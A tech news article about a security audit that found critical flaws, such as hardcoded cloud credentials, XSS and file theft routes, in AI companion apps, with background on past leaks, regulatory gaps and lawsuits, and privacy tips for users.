NewsTech

AI Girlfriend Apps Expose 150M Users in Major Privacy Crisis

Millions of people trust AI companion apps with their deepest secrets. A new security audit shows those secrets are barely protected, and hackers know it.

Researchers have identified critical security flaws in 17 AI companion and “AI girlfriend” apps on Google Play, potentially exposing private chat histories in services used by more than 150 million people.1 The findings paint a picture that should scare every user who has ever whispered a secret to a chatbot expecting privacy. From hardcoded passwords buried in app code to chat windows that hackers can hijack in real time, these apps are sitting ducks. And the people using them have no idea.

What the Oversecured Audit Found

An audit by mobile app security firm Oversecured found 14 critical and 311 high-severity issues across the apps. In 10 of the 17, attackers could find a route to users’ stored conversations, while six contained critical vulnerabilities that could provide direct access to chat data.1

These are not minor glitches. They are deep, structural problems.

Among the most serious issues was the discovery of hardcoded cloud credentials in one app with more than 10 million installs. The credentials included an OpenAI token and a Google Cloud private key embedded in the Android application package, allowing anyone with basic reverse-engineering skills to extract them.1

Sergey Toshin, founder of Oversecured, explained the danger clearly. “One app includes both its OpenAI token and its Google Cloud private key in the code, the Cloud key belongs to the developer’s invoicing system. With those two credentials, you can reach the AI backend and the billing infrastructure.”1

That means a single exploit could unlock both private conversations and financial records. In plain terms, one flaw could hand a hacker your chat logs and your credit card details at the same time.

Here is a snapshot of the key vulnerability types discovered:

Vulnerability Type Risk Level Potential Impact
Hardcoded Cloud Credentials Critical Full access to AI backend and billing systems
Cross-Site Scripting (XSS) Critical Real-time reading of chats, session hijacking
Arbitrary File Theft High Theft of cached photos, voice messages, chat databases
Malicious Ad SDK Exploit High Third-party ad launches internal app components
Weak Password Policies Medium Easy account takeover through brute force

According to the researchers, the vulnerabilities described in the report remained unpatched at the time of the findings.1

AI companion app security vulnerabilities exposing user private data

AI companion app security vulnerabilities exposing user private data

Why Users Share So Much With AI Bots

The real danger here is not just bad code. It is misplaced trust.

The findings focus on a corner of the chatbot market where users often disclose sexual content, relationship problems and highly personal emotional information. Unlike general-purpose assistants, many of the affected services are marketed as virtual romantic partners, dating simulators or roleplay apps, and store conversations on remote servers linked to user accounts.1

Users disclose explicit sexual content, relationship problems, sexual orientation, suicidal thoughts, and domestic conflicts, and these conversations are often stored server-side and in some cases cached locally on users’ devices.2

When you talk to a customer service bot, you keep your guard up. When you talk to a digital “partner” at 2 a.m., you let it all out. That is what makes this data so valuable to criminals.

On the dark web, this kind of data is gold. Oversecured’s Toshin noted that “mental health data carries unique risks. On the dark web, therapy records sell for $1,000 or more per record, far more than credit card numbers.”3

Past Leaks Prove the Threat Is Real

This is not a theoretical risk. It has already happened.

Two AI character apps by the same developer, “Chattee Chat” and “GiMe Chat,” exposed millions of intimate conversations, over 600K images, and other private data. Leaked purchase logs reveal that some users spend thousands of dollars on their AI girlfriends.4 The breach was discovered by Cybernews researchers in August 2025.

Cybernews researchers said “there was virtually no content that could be considered safe for work.”4

In February of this year, another AI chat app exposed 300 million messages from 25 million users through a Firebase misconfiguration.2 These are not isolated events. They are a pattern.

“This troubling leak highlights a huge gap between the complete trust users place in these apps and the security negligence of the developers.” – Cybernews Researchers

Cybernews found that users sent an average of 107 messages to their AI partners, creating a digital footprint that could be exploited for identity theft, harassment, or blackmail.5 Some users even spent up to $18,000 on in-app purchases, showing just how deep the emotional investment runs.

The Regulatory Blind Spot No One Is Fixing

One of the most frustrating parts of this crisis is that no government agency is looking at the right problem.

The research highlights what security specialists describe as a regulatory blind spot. AI companion apps are not treated as healthcare products, despite often collecting disclosures that resemble those made in therapy settings.1

Oversecured says no regulator in any jurisdiction has yet taken enforcement action against an AI companion app for application layer security flaws.2 Not one, anywhere in the world.

The FTC’s inquiry focuses on AI chatbots that “effectively mimic human characteristics, emotions, and intentions.” The FTC sent order letters to Google parent company Alphabet, Character.AI, Instagram and its parent company Meta, OpenAI, Snap, and Elon Musk’s xAI.6 But the focus? Almost entirely on children’s safety.

Oversecured also pointed to new California and New York laws requiring disclosures and suicide prevention measures, and to Italy’s five million euro fine against Replika’s developer over GDPR-related violations as examples of governments acting on privacy and youth protection issues without squarely addressing app layer security.2

Nobody is asking the simplest question: Can these apps actually keep your data safe from a hacker?

While regulators have focused on who should use these apps and what harms they may cause, they have not yet dealt with the simpler and more basic issue of whether the apps can keep those conversations private.2

The Human Cost Beyond Data Leaks

This story is not just about stolen data. It is about real lives at stake.

Some of the apps identified in the audit have already faced scrutiny over other issues, including lawsuits over harm to minors, privacy fines and a case in which chatbot interactions were linked to a user’s death.1

Character.AI has agreed to settle multiple lawsuits alleging the artificial intelligence chatbot maker contributed to mental health crises and suicides among young people, including a case brought by Florida mother Megan Garcia.7 Her son, Sewell Setzer III, died seven months earlier by suicide after developing a deep relationship with Character.AI bots.7

The cases keep mounting. In September 2025, three new lawsuits were filed in one day on behalf of additional children who either died by suicide or suffered serious harm due to Character.AI’s chatbot. In November 2025, seven wrongful death lawsuits were filed in California against OpenAI.8

One app with more than 50 million installs was found to have a weakness in its advertising software development kit. A malicious advert could exploit the flaw to launch internal components and query database tables containing conversations, creating a supply-chain-style risk through ad delivery.1

Think about what that means. A bad actor does not even need to hack the app directly. A single malicious ad could open the door to every private conversation stored on a vulnerable user’s phone.

How to Protect Yourself Right Now

Until laws catch up and developers do better, the responsibility falls on you. Security experts recommend a “Zero Trust” approach to any AI companion app.

Here is what you should do today:

  • Assume every chat is public. Never share anything with an AI that you would not want the whole world to see.
  • Do not link personal accounts. Avoid “Sign in with Google” or “Sign in with Facebook” options. They give attackers a bigger target.
  • Test the password policy. If the app lets you set “1” or “12345” as a password, delete it immediately. That is a red flag.
  • Check for security audits. Support only developers who are open about where your data is stored and who test their apps independently.
  • Limit what you store. Delete old conversations regularly. The less data the app holds, the less a hacker can steal.

The promise of AI companionship is powerful. In a world where loneliness is a public health crisis, the idea of a partner who is always available and never judges you is deeply tempting. Studies have found some of these products may foster psychological dependence, reinforce harmful beliefs, or encourage dangerous actions.9 We need to remember that these apps are not friends. They are software products built to keep you engaged and paying. Over 150 million people have already downloaded these apps, and the technology is moving much faster than our defenses. If you use one, treat it with the same caution you would give any stranger on the internet. Your heart may feel safe, but your data is wide open. Share your thoughts in the comments below. Do you trust AI companions with your personal information

About author

Articles

Sofia Ramirez is a senior correspondent at Thunder Tiger Europe Media with 18 years of experience covering Latin American politics and global migration trends. Holding a Master's in Journalism from Columbia University, she has expertise in investigative reporting, having exposed corruption scandals in South America for The Guardian and Al Jazeera. Her authoritativeness is underscored by the International Women's Media Foundation Award in 2020. Sofia upholds trustworthiness by adhering to ethical sourcing and transparency, delivering reliable insights on worldwide events to Thunder Tiger's readers.

Leave a Reply

Your email address will not be published. Required fields are marked *